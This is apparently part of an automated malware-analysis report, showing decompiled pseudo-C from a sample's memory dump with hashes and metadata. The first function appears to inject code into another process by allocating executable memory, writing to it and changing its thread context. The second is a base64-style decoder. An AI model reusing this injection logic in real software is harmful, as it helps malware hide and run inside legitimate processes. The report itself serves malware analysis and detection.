    																					__eflags = 0;
    																					return 0;
    																				}
    																			} else {
    																				 *(_t607 + 0x9c) = 0;
    																				L90:
    																				_t337 = E0040E4B4(0x93, _t600);
    																				 *_t337(0, 0xffffffff);
    																				 *(_t607 + 0x9c) = 0;
    																				_t340 = E0040E4B4(0x35, _t600);
    																				 *_t340(0, _t607 + 0x9c);
    																				_t344 = E0040E4B4(0x8f, _t600);
    																				 *_t344( *((intOrPtr*)(_t607 + 0xac)), _t600, 0, 0x8000);
    																				_t347 = E0040E4B4(0x8f, _t600);
    																				 *_t347( *((intOrPtr*)(_t607 + 0xac)),  *((intOrPtr*)(_t607 + 0x3c)), 0, 0x8000);
    																				E0040AE90(_t607 + 0x38, _t600);
    																				goto L47;
    																			}
    																		}
    																	}
    																}
    															}
    														} else {
    															__eflags =  *((char*)(_t607 + 0x2c));
    															if(__eflags != 0) {
    																E00408190(_t607 + 0x28, _t600, __eflags);
    															}
    															E0040BAB4( *(_t607 + 0x1c));
    															 *(_t607 + 0x1c) = 0;
    															 *(_t607 + 0x20) = 0;
    															E0040AE90(_t607 + 0x38, _t600);
    															E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    															__eflags =  *((char*)(_t607 + 0x98));
    															if( *((char*)(_t607 + 0x98)) != 0) {
    																__eflags = 0;
    																 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																E00408190(_t607 + 0x94, _t600, 0);
    															}
    															__eflags = 0;
    															return 0;
    														}
    													} else {
    														E0040AE90(_t607 + 0x38, _t600);
    														E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    														__eflags =  *((char*)(_t607 + 0x98));
    														if( *((char*)(_t607 + 0x98)) != 0) {
    															__eflags = 0;
    															 *((intOrPtr*)(_t607 + 0x80)) = 0;
    															 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    															E00408190(_t607 + 0x94, _t600, 0);
    														}
    														__eflags = 0;
    														return 0;
    													}
    												}
    											} else {
    												E00407450(_t607 + 0x60, 0x1c40);
    												 *((intOrPtr*)(_t607 + 0x24)) = E00409700(_t607 + 0x60, 0);
    												 *(_t607 + 4) = 0;
    												 *(_t607 + 8) = 0;
    												 *(_t607 + 0xc) = 0x1c40;
    												 *(_t607 + 0x10) = 0;
    												_t387 = E0040C7FC( *((intOrPtr*)(_t607 + 0xa0)), 4, 0x3000, __eflags);
    												 *(_t607 + 0x28) = _t387;
    												_t600 = 0x3000;
    												__eflags = _t387 | 0x00003000;
    												if(__eflags == 0) {
    													E0040AE90(_t607 + 0x5c, 0x3000);
    													E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    													__eflags =  *((char*)(_t607 + 0x98));
    													if( *((char*)(_t607 + 0x98)) != 0) {
    														__eflags = 0;
    														 *((intOrPtr*)(_t607 + 0x80)) = 0;
    														 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    														E00408190(_t607 + 0x94, 0x3000, 0);
    													}
    													__eflags = 0;
    													return 0;
    												} else {
    													 *(_t607 + 4) = 0;
    													 *(_t607 + 8) = 0;
    													 *(_t607 + 0xc) = 0x3a4;
    													 *(_t607 + 0x10) = 0;
    													_t395 = E0040C7FC( *((intOrPtr*)(_t607 + 0xa0)), 0x40, 0x3000, __eflags);
    													 *(_t607 + 0x20) = _t395;
    													 *(_t607 + 0x1c) = 0x3000;
    													__eflags = _t395 |  *(_t607 + 0x1c);
    													if(__eflags != 0) {
    														 *(_t607 + 8) =  *(_t607 + 0x28);
    														 *(_t607 + 0xc) = 0x3000;
    														 *(_t607 + 0x10) = _t395;
    														 *(_t607 + 0x14) =  *(_t607 + 0x1c);
    														E0040D528( *((intOrPtr*)(_t607 + 0x24)), 0x40, _t601, __eflags);
    														_t581 =  *((intOrPtr*)(_t607 + 0x7c));
    														_t399 =  *((intOrPtr*)(_t607 + 0x24)) + 0x160;
    														__eflags = _t581 - _t399;
    														if(_t581 != _t399) {
    															E0040E9F0(_t607 + 0x84, _t399, 0);
    															_t581 =  *((intOrPtr*)(_t607 + 0x7c));
    														}
    														_push(4);
    														_push(3);
    														_push(3);
    														_push(_t581);
    														E0040367C(_t607 + 0x58);
    														_t402 = E004019A0(_t607 + 0x54);
    														__eflags = _t402;
    														if(_t402 != 0) {
    															E004019C0(_t607 + 0x50, __eflags, E00409700(_t590, 0),  *((intOrPtr*)(_t590 + 8)));
    															__eflags =  *((char*)(_t607 + 0x58));
    															if(__eflags != 0) {
    																E00408190(_t607 + 0x54, _t600, __eflags);
    															}
    															E0040BAB4( *((intOrPtr*)(_t607 + 0x48)));
    															 *(_t607 + 4) =  *(_t607 + 0x28);
    															 *(_t607 + 8) = _t600;
    															 *(_t607 + 0x14) = 0;
    															 *((intOrPtr*)(_t607 + 0x48)) = 0;
    															 *((intOrPtr*)(_t607 + 0x4c)) = 0;
    															_t408 = E0040C8BC( *((intOrPtr*)(_t607 + 0xa0)), 0x1c40,  *((intOrPtr*)(_t607 + 0x24)), __eflags);
    															 *(_t607 + 0x9c) = _t408;
    															__eflags = _t408;
    															if(__eflags == 0) {
    																E0040AE90(_t607 + 0x5c, _t600);
    																E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    																__eflags =  *((char*)(_t607 + 0x98));
    																if( *((char*)(_t607 + 0x98)) != 0) {
    																	__eflags = 0;
    																	 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																	 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																	E00408190(_t607 + 0x94, _t600, 0);
    																}
    																__eflags = 0;
    																return 0;
    															} else {
    																_t496 =  *(_t607 + 0x20);
    																 *(_t607 + 4) = _t496;
    																_t603 =  *(_t607 + 0x1c);
    																 *(_t607 + 8) = _t603;
    																 *(_t607 + 0x14) = 0;
    																_t416 = E0040C8BC( *((intOrPtr*)(_t607 + 0xa0)), 0x3a4, 0x416820, __eflags);
    																 *(_t607 + 0x9c) = _t416;
    																__eflags = _t416;
    																if(__eflags == 0) {
    																	E0040AE90(_t607 + 0x5c, _t600);
    																	E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    																	__eflags =  *((char*)(_t607 + 0x98));
    																	if( *((char*)(_t607 + 0x98)) != 0) {
    																		__eflags = 0;
    																		 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																		 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																		E00408190(_t607 + 0x94, _t600, 0);
    																	}
    																	__eflags = 0;
    																	return 0;
    																} else {
    																	 *(_t607 + 4) = _t496;
    																	 *(_t607 + 8) = _t603;
    																	_t591 =  *(_t607 + 0x28);
    																	 *(_t607 + 0xc) = _t591;
    																	 *(_t607 + 0x10) = _t600;
    																	_t497 = E0040D44C( *((intOrPtr*)(_t607 + 0xa0)), _t496, 0, 0, __eflags);
    																	__eflags = _t497;
    																	if(_t497 == 0) {
    																		E0040AE90(_t607 + 0x5c, _t600);
    																		E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    																		__eflags =  *((char*)(_t607 + 0x98));
    																		if( *((char*)(_t607 + 0x98)) != 0) {
    																			__eflags = 0;
    																			 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																			 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																			E00408190(_t607 + 0x94, _t600, 0);
    																		}
    																		__eflags = 0;
    																		return 0;
    																	} else {
    																		_t432 = E0040E4B4(0x93, _t600);
    																		 *_t432(_t497, 0xffffffff);
    																		 *(_t607 + 0x9c) = 0;
    																		_t435 = E0040E4B4(0x35, _t600);
    																		 *_t435(_t497, _t607 + 0x9c);
    																		 *(_t607 + 4) =  *(_t607 + 0x20);
    																		 *(_t607 + 8) =  *(_t607 + 0x1c);
    																		 *(_t607 + 0xc) = 0;
    																		 *(_t607 + 0x10) = 0;
    																		E0040C968( *((intOrPtr*)(_t607 + 0xa0)), 0x8000, __eflags);
    																		 *(_t607 + 4) = _t591;
    																		 *(_t607 + 8) = _t600;
    																		 *(_t607 + 0xc) = 0;
    																		 *(_t607 + 0x10) = 0;
    																		E0040C968( *((intOrPtr*)(_t607 + 0xa0)), 0x8000, __eflags);
    																		E0040AE90(_t607 + 0x5c, _t600);
    																		while(1) {
    																			L47:
    																			_t351 = E0040E4B4(0x17, _t600);
    																			_t352 =  *_t351( *((intOrPtr*)(_t607 + 0x7c)));
    																			 *(_t607 + 0x9c) = _t352;
    																			__eflags = _t352;
    																			if(_t352 != 0) {
    																				break;
    																			}
    																			E00402024(0x3e8, _t600);
    																		}
    																		E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    																		__eflags =  *((char*)(_t607 + 0x98));
    																		if( *((char*)(_t607 + 0x98)) != 0) {
    																			__eflags = 0;
    																			 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																			 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																			E00408190(_t607 + 0x94, _t600, 0);
    																		}
    																		return 1;
    																	}
    																}
    															}
    														} else {
    															__eflags =  *((char*)(_t607 + 0x58));
    															if(__eflags != 0) {
    																E00408190(_t607 + 0x54, _t600, __eflags);
    															}
    															E0040BAB4( *((intOrPtr*)(_t607 + 0x48)));
    															 *((intOrPtr*)(_t607 + 0x48)) = 0;
    															 *((intOrPtr*)(_t607 + 0x4c)) = 0;
    															E0040AE90(_t607 + 0x5c, _t600);
    															E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    															__eflags =  *((char*)(_t607 + 0x98));
    															if( *((char*)(_t607 + 0x98)) != 0) {
    																__eflags = 0;
    																 *((intOrPtr*)(_t607 + 0x80)) = 0;
    																 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    																E00408190(_t607 + 0x94, _t600, 0);
    															}
    															__eflags = 0;
    															return 0;
    														}
    													} else {
    														E0040AE90(_t607 + 0x5c, 0x3000);
    														E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
    														__eflags =  *((char*)(_t607 + 0x98));
    														if( *((char*)(_t607 + 0x98)) != 0) {
    															__eflags = 0;
    															 *((intOrPtr*)(_t607 + 0x80)) = 0;
    															 *((intOrPtr*)(_t607 + 0x7c)) = 0;
    															E00408190(_t607 + 0x94, 0x3000, 0);
    														}
    														__eflags = 0;
    														return 0;
    													}
    												}
    											}
    										}
    									} else {
    										__eflags = 0;
    										return 0;
    									}
    								} else {
    									__eflags = 0;
    									return 0;
    								}
    							}
    						}
    					} else {
    						goto L5;
    					}
    				}
    			}


    Memory Dump Source
    • Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e1b6ac78f48c8ac23d66b5682442f143f7c13e847981c549b6c19fbe490dfd2a
    • Instruction ID: d1440420a180975574e9ab902ee0bb4ceb1a01d3df5df17f20b76a6aeee57a4f
    • Opcode Fuzzy Hash: e1b6ac78f48c8ac23d66b5682442f143f7c13e847981c549b6c19fbe490dfd2a
    • Instruction Fuzzy Hash: 60523F716083409FD360EB76D881B9FB7E0AF84314F10493FF599A62D2DB789945CB8A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040AC50(intOrPtr* __ecx) {
    				intOrPtr _t39;
    				signed int _t43;
    				intOrPtr* _t44;
    				signed int _t45;
    				unsigned int _t46;
    				void* _t51;
    				intOrPtr _t52;
    				void* _t56;
    				char* _t58;
    				void* _t60;
    				char* _t61;
    				intOrPtr _t62;
    				signed int _t71;
    				intOrPtr _t72;
    				signed int _t73;
    				signed int _t79;
    				char* _t80;
    				intOrPtr _t81;
    				void* _t82;
    				unsigned int _t87;
    				char* _t89;
    				char* _t90;
    				void* _t91;
    
    				_t44 = __ecx;
    				_t89 =  *((intOrPtr*)(_t91 + 0x38));
    				E00401990();
    				if(_t89 == 0 ||  *_t89 == 0) {
    					return _t44;
    				} else {
    					_t61 = _t89;
    					_t71 = 0;
    					_t80 = _t61;
    					do {
    						_t61 = _t61 + 1;
    						_t71 = _t71 + 1;
    					} while ( *_t61 != 0);
    					E00409F60(__ecx, _t71);
    					_t51 = 0;
    					if( *_t89 != 0) {
    						do {
    							_t80 = _t80 + 1;
    							_t51 = _t51 + 1;
    						} while ( *_t80 != 0);
    					}
    					_t52 = _t51 + _t89;
    					_t62 = 0;
    					_t72 =  *_t44;
    					_t81 =  *((intOrPtr*)(_t44 + 8));
    					if(_t89 < _t52) {
    						 *((intOrPtr*)(_t91 + 0x20)) = _t52;
    						_t39 = 0;
    						 *((intOrPtr*)(_t91 + 8)) = _t81;
    						 *((intOrPtr*)(_t91 + 0x14)) = _t72;
    						 *((intOrPtr*)(_t91 + 4)) = _t44;
    						do {
    							_t45 = 0;
    							_t73 = 0;
    							 *((intOrPtr*)(_t91 + 0x18)) = _t39;
    							_t82 = 0;
    							 *((intOrPtr*)(_t91 + 0x1c)) = _t62;
    							while(_t89 <  *((intOrPtr*)(_t91 + 0x20))) {
    								_t43 = E0040ADE4( *_t89);
    								_t10 = _t82 - 1; // -1
    								_t88 =  ==  ? _t10 : _t82;
    								_t82 = ( ==  ? _t10 : _t82) + 1;
    								_t45 =  !=  ? _t45 << 0x00000006 | _t43 : _t45;
    								_t11 = _t73 + 6; // 0x6
    								_t73 =  !=  ? _t11 : _t73;
    								_t89 = _t89 + 1;
    								if(_t82 < 4) {
    									continue;
    								}
    								break;
    							}
    							_t39 =  *((intOrPtr*)(_t91 + 0x18));
    							_t62 =  *((intOrPtr*)(_t91 + 0x1c));
    							_t87 = (_t73 >> 2 >> 0x1d) + _t73 >> 3;
    							if(_t39 == 0) {
    								 *(_t91 + 0xc) = _t45;
    								_t45 =  *(_t91 + 0xc);
    								_t39 =  >  ? 1 : _t39;
    							}
    							_t46 = _t45 <<  ~_t73 + 0x18;
    							if(_t87 > 0) {
    								_t62 = _t62 + _t87;
    								if(_t39 == 0) {
    									_t79 = (_t87 >> 0x1f) + _t87 >> 1;
    									if(_t79 <= 0) {
    										_t56 = 1;
    									} else {
    										 *((intOrPtr*)(_t91 + 0x10)) = _t89;
    										_t60 = 0;
    										 *((intOrPtr*)(_t91 + 0x18)) = _t39;
    										 *((intOrPtr*)(_t91 + 0x1c)) = _t62;
    										_t90 =  *((intOrPtr*)(_t91 + 0x14));
    										do {
    											_t60 = _t60 + 1;
    											 *_t90 = _t46 >> 0x10;
    											 *((char*)(_t90 + 1)) = (_t46 & 0x00ffff00) >> 8;
    											_t90 = _t90 + 2;
    											_t46 = _t46 << 0x10;
    										} while (_t60 < _t79);
    										 *((intOrPtr*)(_t91 + 0x14)) = _t90;
    										_t56 = _t60 + _t60 + 1;
    										_t39 =  *((intOrPtr*)(_t91 + 0x18));
    										_t62 =  *((intOrPtr*)(_t91 + 0x1c));
    										_t89 =  *((intOrPtr*)(_t91 + 0x10));
    									}
    									if(_t87 > _t56 - 1) {
    										_t58 =  *((intOrPtr*)(_t91 + 0x14));
    										 *_t58 = _t46 >> 0x10;
    										 *((intOrPtr*)(_t91 + 0x14)) = _t58 + 1;
    									}
    								}
    							}
    						} while (_t89 <  *((intOrPtr*)(_t91 + 0x20)));
    						_t44 =  *((intOrPtr*)(_t91 + 4));
    					}
    					E00409F60(_t44, _t62);
    					return _t44;
    				}
    			}


    Memory Dump Source
    • Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4113574f4ba36a50daa565143a4a908347b1621901a6703a37eec8d59b2e8513
    • Instruction ID: 77cfc4a41ca4d12f4a95c08d8bfb30acf8e0fbc0da1748c467e1b1d680be855c
    • Opcode Fuzzy Hash: 4113574f4ba36a50daa565143a4a908347b1621901a6703a37eec8d59b2e8513
    • Instruction Fuzzy Hash: E1410172A083558FD714CE29888016FF7D2EFD5310F058A3EE899AB381D638DD5AC796
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f06e87e9fbd4951d690df65b20260cfb70d11d1d8ae34566e4e04ed26c408d30
    • Instruction ID: 4040641850cb8629d64f83f392e5cf01d424c70db25eb4935c55a16a010ab148
    • Opcode Fuzzy Hash: f06e87e9fbd4951d690df65b20260cfb70d11d1d8ae34566e4e04ed26c408d30
    • Instruction Fuzzy Hash: 3D517472669EC1978341EF6DC5C4EC47BB0F3EAB6239C0958E06183352D75AE905CB84
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e6e0655a7a14a8b2f49f19991a92f7c51b4a4b023e9a9046ae205a97c008c69b
    • Instruction ID: d4cb2fa82a4468d1c12cbd1453d1f29fe623fc00a9952bca79de7d4b856f1ff0
    • Opcode Fuzzy Hash: e6e0655a7a14a8b2f49f19991a92f7c51b4a4b023e9a9046ae205a97c008c69b
    • Instruction Fuzzy Hash: F0310F1332AECD46C34ADB34C1515C23FE9E5965313C8CEB8D0BB422ABC686A50FD788
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e81ec70b5eb304031a5b0a02687049b52f29027f59d9b37b3e431511f9576bc4
    • Instruction ID: dcc22f0b0dbd34b6afb875651b6cc3c5dae16f6707c9e6fa1e49f82bbc378d62
    • Opcode Fuzzy Hash: e81ec70b5eb304031a5b0a02687049b52f29027f59d9b37b3e431511f9576bc4
    • Instruction Fuzzy Hash: 57311C7222EAC547C346DB3DC5C46487FB1E7DAB2138C8B9DD0A283782C759A60AC794
    Uniqueness

    Uniqueness Score: -1.00%